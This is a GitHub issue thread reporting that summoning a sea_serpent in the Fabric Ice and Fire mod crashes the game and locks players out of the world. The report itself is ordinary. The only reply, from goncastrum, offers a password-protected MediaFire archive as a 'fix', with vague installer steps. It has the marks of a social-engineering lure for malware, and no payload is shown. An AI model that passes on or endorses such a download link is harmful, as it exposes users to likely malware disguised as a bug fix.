### ISSUE TITLE
sea_serpent causes crash, and world lockout

### ISSUE THREAD

**Issue by NFLD99** [ArkTechMC/IceAndFire-Fabric#38]
### What had happened?
crash after a `/summon iceandfire:sea_serpent ~ ~ ~ {NoAI:1}`
you can no longer join the world or server

### Mod Version (Include dependencies)
[iceandfire-0.6-alpha7.jar](https://www.curseforge.com/minecraft/mc-mods/iceandfire-fabric/files/5683201)
[Uranus-1.6.1.jar](https://www.curseforge.com/minecraft/mc-mods/uranus/files/5600816)
[Jupiter-0.5-fabric.jar](https://www.curseforge.com/minecraft/mc-mods/jupiter/files/5627086)

### Mod Loader Version
Fabric 0.16.0

### Game Log
[crash-2024-09-01_18.37.04-server.txt](https://gist.githubusercontent.com/NFLD99/55830907eab0878baf9838a37351922e/raw/6f2f134cd76fa7029aea9667e75272df9dd1a75e/crash-2024-09-01_18.37.04-server.txt)
[crash-2024-09-01_18.37.05-client.txt](https://gist.githubusercontent.com/NFLD99/3a44a51a5dc4e5f887fc0c7cf264a268/raw/6b1563792f6edb70b78e60e6d2cc59a8ebd57ec7/crash-2024-09-01_18.37.05-client.txt)
[latest.log](https://gist.githubusercontent.com/NFLD99/df5650efaa4adbaf027722b50790028b/raw/62c82b698bf09dc6826efd07aaeb32e818ad4d70/latest.log)

### Checklist
- [✔] I don't install Optifine
- [❌] I have installed other mods

### Full Mods List:
Fabric API
[iceandfire-0.6-alpha7.jar](https://www.curseforge.com/minecraft/mc-mods/iceandfire-fabric/files/5683201)
[Uranus-1.6.1.jar](https://www.curseforge.com/minecraft/mc-mods/uranus/files/5600816)
[Jupiter-0.5-fabric.jar](https://www.curseforge.com/minecraft/mc-mods/jupiter/files/5627086)

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
